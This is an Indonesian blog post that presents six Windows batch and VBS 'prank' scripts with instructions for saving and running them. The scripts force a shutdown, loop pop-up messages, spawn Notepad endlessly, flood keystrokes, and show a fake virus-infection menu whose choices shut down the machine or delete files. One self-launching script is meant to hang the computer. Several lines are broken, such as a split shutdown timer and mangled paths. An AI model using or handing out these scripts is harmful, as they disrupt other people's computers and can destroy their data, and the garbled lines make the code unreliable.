Newest Post

// Posted by :MUHAMMAD FAJRIAN // On :Kamis, 19 Desember 2013

LANGKAH - LANGKAH MEMBUATNYA SEBAGAI BERIKUT

  1. Open/Buka Notepad. Caranya ktik start + R<untuk nembuka run lalu ktik "notepad" Tanpa tanda kutip.
  2. kalok sudah copy dan paste code berikut.


1.<Membuat komputer Shoutdown>.
-------------------------------------------------------------------------------------------


@echo off

msg * I don't like you

shutdown -c "(masukan komentar sendiri)" -s


_________________________________________________________________

save as dengan "(terserah anda) .bat" tanpa tanda petik.

...................................................................................................................

2. <Membuat Pesan yang muncul terus menerus>.  :D

--------------------------------------------------------------------------------------------

@ECHO off

:Begin

msg * (masukan pesan anda)

msg * (masukan pesan anda)

msg*(masukan pesan anda)

msg*(masukan pesan anda)

msg *(masukan pesan anda)

GOTO BEGIN

__________________________________________________________________

save as dengan "(terserah anda) .bat" tanpa tanda petik.

....................................................................................................................


3. <Cara Membuat Notepad Terbuka SECARA OTOMATIS>.

---------------------------------------------------------------------------------------------


@ECHO off

:atas

START %SystemRoot%\system32\notepad.exe

GOTO atas

__________________________________________________________________

save as dengan "(terserah anda) .bat" tanpa tanda petik.

....................................................................................................................



4.  <MEMBUA NOTEPAD DENGAN PESAN>.

---------------------------------------------------------------------------------------------

WScript.Sleep 1800

WScript.Sleep 100

Set WshShell = WScript.CreateObject("WScript.Shell")

WshShell.Run "notepad"

WScript.Sleep 10

WshShell.AppActivate "Notepad"

WScript.Sleep 50

WshShell.SendKeys "tulis pesan"

WScript.Sleep 50

WshShell.SendKeys "tulis pesan"

WScript.Sleep 50

WshShell.SendKeys "tulis pesan"

WScript.Sleep 50

WshShell.SendKeys "tulis pesan"

WScript.Sleep 50

WshShell.SendKeys "tulis pesan"

WScript.Sleep 50

WshShell.SendKeys "tulis pesan"

WScript.Sleep 50

WshShell.SendKeys "tulis pesan"

WScript.Sleep 50

WshShell.SendKeys "tulis pesan"

WScript.Sleep 50

WshShell.SendKeys "tulis pesan"

WScript.Sleep 50

WshShell.SendKeys "tulis pesan"

WScript.Sleep 50

WshShell.SendKeys "tulis pesan"

WScript.Sleep 50

WshShell.SendKeys "tulis pesan"

WScript.Sleep 50

WshShell.SendKeys "tulis pesan"

__________________________________________________________________

save as dengan "(terserah anda) .vbs" tanpa tanda petik.

...................................................................................................................


5.  <Cara Membuat dan Pilihan>

--------------------------------------------------------------------------------------------


@echo off

title pertanyaan hari ini

:menu

cls

echo apa bila anda komputer anda terinveksi silahkan pilih:

pause

echo 1. repair koputer

echo 2. instal ulang

echo 3. beli yang baru

set input=nothing

set /p input=Choice:

if %input%==1 shutdown -s -t

30

if %input%==2 del c:xxx

if %input%==3 @ECHO off

msg * waduhhh

msg * kok jadi gini ya boy ?

msg * komputer boy terinpeksi virus luar negri

msg * cepet-cepet install ulang

msg * agar tidk merusak hadware yang lainnya

@ECHO off

:top

START %SystemRoot%

system32notepad.exe

GOTO top

_______________________________________________________________________

save as dengan "(terserah anda) .bat" tanpa tanda petik.

............................................................................................................................



6.  <Membuat Komputer Hang dengan Kode script Notepad>.

---------------------------------------------------------------------------------------------------


start q.bat

start q.bat

start q.bat

start q.bat

start q.bat

start q.bat

start q.bat

start q.bat

start q.bat

start q.bat

________________________________________________________________________
save as dengan "start q.bat" tanpa tanda petik.

...............................................................................................................................


Semoga sukses Gan

hehehehe....

by: MR.RENER





Leave a Reply

Subscribe to Posts | Subscribe to Comments

// Copyright © Ryan-The Mr.Rener //Anime-Note//Powered by Blogger // Designed by Johanes Djogan //